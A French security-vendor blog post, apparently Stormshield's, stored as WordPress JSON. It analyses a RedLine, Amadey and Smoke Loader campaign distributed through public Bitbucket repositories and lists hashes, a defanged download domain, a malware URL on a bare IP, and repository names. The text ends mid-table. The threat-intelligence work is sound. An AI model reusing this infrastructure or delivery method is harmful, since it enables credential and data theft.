{"id":398497,"date":"2023-05-10T12:00:11","date_gmt":"2023-05-10T11:00:11","guid":{"rendered":"https:\/\/www.stormshield.com\/?p=398497"},"modified":"2024-01-30T15:43:06","modified_gmt":"2024-01-30T14:43:06","slug":"malware-redline-extension-chrome-campagne-malveillante-envergure","status":"publish","type":"post","link":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/","title":{"rendered":"Malware RedLine : d\u2019une extension Chrome \u00e0 une campagne malveillante d\u2019envergure"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<strong>L\u2019arbre qui cache la for\u00eat, illustration cyber. En partant d\u2019une analyse d\u2019une simple extension Google Chrome malveillante, l\u2019\u00e9quipe de Cyber Threat Intelligence de Stormshield a mis en lumi\u00e8re une campagne d\u2019envergure. Entre IOCs, binaires et ex\u00e9cutables, plong\u00e9e technique autour du malware RedLine.<\/strong><\/p>\n<p>Lors de sa veille, l'\u00e9quipe Stormshield Customer Security Lab (SCSL) se penche <a href=\"https:\/\/twitter.com\/crep1x\/status\/1648063045808148481\" target=\"_blank\" rel=\"noopener\">sur un tweet d'un chercheur de Sekoia.io<\/a> concernant une extension malveillante pour Google Chrome. Celle-ci s\u2019av\u00e8re sobrement classique au niveau de son fonctionnement, dans le but d'exfiltrer les donn\u00e9es des internautes, du simple historique de navigation aux cookies de connexion en passant par les fichiers pr\u00e9sents sur le disque. Mais un \u0153il averti sur la campagne de distribution a fait ressortir plusieurs signaux forts. Les membres de l\u2019\u00e9quipe SCSL ont alors creus\u00e9 et remont\u00e9 la piste jusqu'au vecteur de distribution. <em>Deep dive<\/em> dans RedLine.<\/p>\n<p>&nbsp;<\/p>\n<h2>Vue d\u2019ensemble de la campagne<\/h2>\n<p>En exposant une cha\u00eene d\u2019attaque complexe, nos chercheurs ont identifi\u00e9 une nouvelle campagne, utilisant les malwares Smoke Loader, <a href=\"https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/win.amadey\" target=\"_blank\" rel=\"noopener\">Amadey<\/a> et RedLine. Si Amadey est un botnet utilis\u00e9 pour distribuer d'autres malwares, <a href=\"https:\/\/infosecwriteups.com\/redline-stealer-malware-static-analysis-69367b37a146\" target=\"_blank\" rel=\"noopener\">RedLine<\/a> est quant \u00e0 lui un trojan stealer qui a pour but de voler des donn\u00e9es comme des mots de passe, des portefeuilles de cryptomonnaies ou encore des num\u00e9ros de cartes de cr\u00e9dit. Jusqu\u2019ici, rien de r\u00e9volutionnaire non plus, les deux malwares \u00e9tant connus depuis 2018 et 2020.<\/p>\n<p>Suivant un d\u00e9roulement classique, les victimes sont invit\u00e9es \u00e0 t\u00e9l\u00e9charger un fichier ex\u00e9cutable depuis un site malveillant. Une zone d\u2019ombre existe encore quant \u00e0 la technique utilis\u00e9e pour acc\u00e9der \u00e0 ce fichier, mais les exemples connus autour du malware RedLine sont d\u00e9j\u00e0 nombreux, des <a href=\"https:\/\/www.kaspersky.fr\/blog\/redline-stealer-self-propagates-on-youtube\/19474\/\" target=\"_blank\" rel=\"noopener\">commentaires sur des vid\u00e9os YouTube<\/a> aux <a href=\"https:\/\/www.clubic.com\/antivirus-securite-informatique\/virus-hacker-piratage\/malware-logiciel-malveillant\/actualite-408474-le-malware-redline-stealer-se-deguise-sous-la-forme-d-une-mise-a-jour-de-windows-11.html\" target=\"_blank\" rel=\"noopener\">fausses applications Discord<\/a>. Les victimes vont ensuite ex\u00e9cuter ce fichier, pensant \u00eatre en pr\u00e9sence d\u2019une application l\u00e9gitime.<\/p>\n<p>Ce programme malveillant va alors contacter un serveur de <em>Command and Control<\/em> (C2), qui va lui fournir une URL contenant des ex\u00e9cutables \u00e0 t\u00e9l\u00e9charger et installer. D\u00e9couverte dans le cas de notre analyse, <strong>la particularit\u00e9 de cette campagne est l'utilisation de d\u00e9p\u00f4ts Bitbucket.org publics pour la distribution de ces logiciels malveillants<\/strong>. Pour information, Bitbucket.org est un service en ligne de gestion d'applications, incluant le code source et les versions distribuables. L'analyse de ces d\u00e9p\u00f4ts Bitbucket.org nous a permis de d\u00e9couvrir la pr\u00e9sence de plusieurs stealers ainsi que de serveurs C2. En fonction des informations fournies par son C2, le programme va alors t\u00e9l\u00e9charger diff\u00e9rentes ressources, suivant deux sc\u00e9narios : une s\u00e9rie d\u2019ex\u00e9cutables et le lancement d\u2019un stealer derri\u00e8re une fausse extension pour Google Chrome d\u2019un c\u00f4t\u00e9, et de l\u2019autre, le simple lancement d\u2019un stealer.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"398498\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 1 : Cha\u00eene d'attaque<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>Le m\u00e9canisme d\u2019attaque de la campagne<\/h2>\n<h3>Toolspub2, Lega, Oneetx : vecteur initial et premiers ex\u00e9cutables<\/h3>\n<h4><strong>Toolspub2.exe<\/strong><\/h4>\n<p>Toolspub2.exe est le vecteur initial. L\u2019internaute va le t\u00e9l\u00e9charger depuis <code>hxxp:\/\/respokt5569[.]com<\/code>.<\/p>\n<p>Ce binaire (<code>d357ee75ad99cffebca2ad9bd3daff07dde0c7b54dcc115e5620a148b4ef0936<\/code>) est un sample de la famille du malware Smoke Loader, qui permet de d\u00e9poser et d'ex\u00e9cuter d\u2019autres charges sur un poste compromis.<\/p>\n<h4><strong>Lega.exe<\/strong><\/h4>\n<p>Ce second binaire (<code>7788bdad16dc89ceb5d5c4cdfd0acc23175f03af715a7c67c41a5b3cec418f6b<\/code>) a \u00e9t\u00e9 trouv\u00e9 sous plusieurs noms diff\u00e9rents et correspond \u00e0 chaque fois \u00e0 un ensemble d'archives auto-extractibles imbriqu\u00e9es les unes dans les autres.<\/p>\n<p>Une fois les d\u00e9compressions effectu\u00e9es, cet ex\u00e9cutable en d\u00e9pose plusieurs autres (oneext.exe, virus.exe, togwcstgxg.exe ou encore ghostworker.exe) et lance le t\u00e9l\u00e9chargement du fichier clip.dll (<code>f336fa91d52edf1a977a5b8510c1a7b0b22dd6d51576765e10a1fc98fb38109f<\/code>) se trouvant \u00e0 l'URL <code>212[.]113.199.255\/joomla\/clip.dll<\/code>. Oneetx.exe est ensuite lanc\u00e9.<\/p>\n<h4><strong>Oneetx.exe<\/strong><\/h4>\n<p>Cet ex\u00e9cutable (<code>13b4b17671c12fd3f9db5491efb7fb389601b57ac7f89fd78638625c1ef201e4<\/code>) est un sample d'Amadey. Amadey est un botnet apparu vers octobre 2018 et vendu pour environ 500$ sur des forums de piratage russophones. Une fois install\u00e9 sur l'ordinateur d'une victime, il envoie p\u00e9riodiquement des informations sur le syst\u00e8me et les logiciels anti-virus install\u00e9s \u00e0 son serveur C2. Cela permet de conna\u00eetre les moyens de protection d\u00e9ploy\u00e9s sur le syst\u00e8me cibl\u00e9 avant effectuer d\u2019autres actions.Oneetx.exe interroge ensuite ce serveur pour recevoir des ordres de sa part. Sa principale fonctionnalit\u00e9 est de lancer d'autres charges malveillantes sur les postes compromis.<\/p>\n<p>Oneetx.exe t\u00e9l\u00e9charge et d\u00e9ploie d\u2019autres malwares pour poursuivre l'attaque (<em>cf. plus loin dans l\u2019article<\/em>). Les ex\u00e9cutables t\u00e9l\u00e9charg\u00e9s sont r\u00e9cup\u00e9r\u00e9s sur des URL qui changent avec le temps. Pour obtenir l'adresse des binaires \u00e0 t\u00e9l\u00e9charger, Oneetx.exe commence par communiquer avec son serveur C2 sur une adresse \u00e9crite en dur. Cette premi\u00e8re communication contient quelques informations sur le syst\u00e8me cible permettant de l'identifier (comme le nom de la machine, celui de l'utilisateur ou encore l\u2019identifiant g\u00e9n\u00e9r\u00e9 par le malware). Si le serveur remarque que le syst\u00e8me cible est d\u00e9j\u00e0 infect\u00e9, sa r\u00e9ponse est vide. Autrement, le C2 r\u00e9pond par une liste d'URL r\u00e9f\u00e9ren\u00e7ant les ex\u00e9cutables \u00e0 t\u00e9l\u00e9charger, puis \u00e0 ex\u00e9cuter.<\/p>\n<p>Ces URL sont chiffr\u00e9es et encod\u00e9es. La cl\u00e9 de chiffrement est stock\u00e9e en dur dans l'ex\u00e9cutable de Oneetx.exe.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"402339\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 2 : processus de r\u00e9cup\u00e9ration des charges malveillantes<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_row_inner row_type=\"row\" type=\"full_width\" text_align=\"left\" css_animation=\"\"][vc_column_inner][vc_column_text]<\/p>\n<h3>L\u2019utilisation de d\u00e9p\u00f4ts Bitbucket.org<\/h3>\n<p>Lors de notre analyse dans les \u00e9changes entre les ex\u00e9cutables et les serveurs C2, nous avons trouv\u00e9 plusieurs d\u00e9p\u00f4ts Bitbucket.org publics. Ces d\u00e9p\u00f4ts ont eu une dur\u00e9e d'exploitation comprise entre un et dix jours.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_0\"\n     id='ninja_table_builder_418139'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_0\"\n     style=\"\n     max-height:800px;\n     max-width: 1160px;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_418139\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_3491590\" class=\"desktop-view tr_class_3491590 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22847003\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22847003\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22847003\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Name of the deposit<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_22793427\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22793427\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22793427\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">User<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_33928335\" rowspan=\"1\" colspan=\"1\" class=\"td_class_33928335\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_33928335\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Creation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_59844509\" rowspan=\"1\" colspan=\"1\" class=\"td_class_59844509\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_59844509\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">First activity<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_93298851\" rowspan=\"1\" colspan=\"1\" class=\"td_class_93298851\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_93298851\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Last activity<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5996259\" class=\"desktop-view tr_class_5996259 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_58367102\" rowspan=\"1\" colspan=\"1\" class=\"td_class_58367102\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_58367102\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">coldminusthousand\/needheater\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_99149449\" rowspan=\"1\" colspan=\"1\" class=\"td_class_99149449\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_99149449\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Helio Hellard\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_38127041\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38127041\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_38127041\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">19\/02\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_77818469\" rowspan=\"1\" colspan=\"1\" class=\"td_class_77818469\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_77818469\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">04\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_79758814\" rowspan=\"1\" colspan=\"1\" class=\"td_class_79758814\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_79758814\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">09\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5758342\" class=\"desktop-view tr_class_5758342 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_63686167\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63686167\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63686167\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">dushanbepromo-kingsof\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_51524756\" rowspan=\"1\" colspan=\"1\" class=\"td_class_51524756\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_51524756\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Rustam Boboev<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_72553984\" rowspan=\"1\" colspan=\"1\" class=\"td_class_72553984\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_72553984\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">05\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85913555\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85913555\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85913555\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_55165814\" rowspan=\"1\" colspan=\"1\" class=\"td_class_55165814\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_55165814\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4397368\" class=\"desktop-view tr_class_4397368 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_48686809\" rowspan=\"1\" colspan=\"1\" class=\"td_class_48686809\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_48686809\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">8phyxsdd8t5e\/8phyxsdd8t5e\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_44634100\" rowspan=\"1\" colspan=\"1\" class=\"td_class_44634100\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_44634100\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">qwert3033\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_50977953\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50977953\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50977953\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_31388423\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31388423\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31388423\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_13241092\" rowspan=\"1\" colspan=\"1\" class=\"td_class_13241092\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_13241092\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3735243\" class=\"desktop-view tr_class_3735243 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_39030866\" rowspan=\"1\" colspan=\"1\" class=\"td_class_39030866\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_39030866\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">kinggodsoft-kinggodsoft\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_57071677\" rowspan=\"1\" 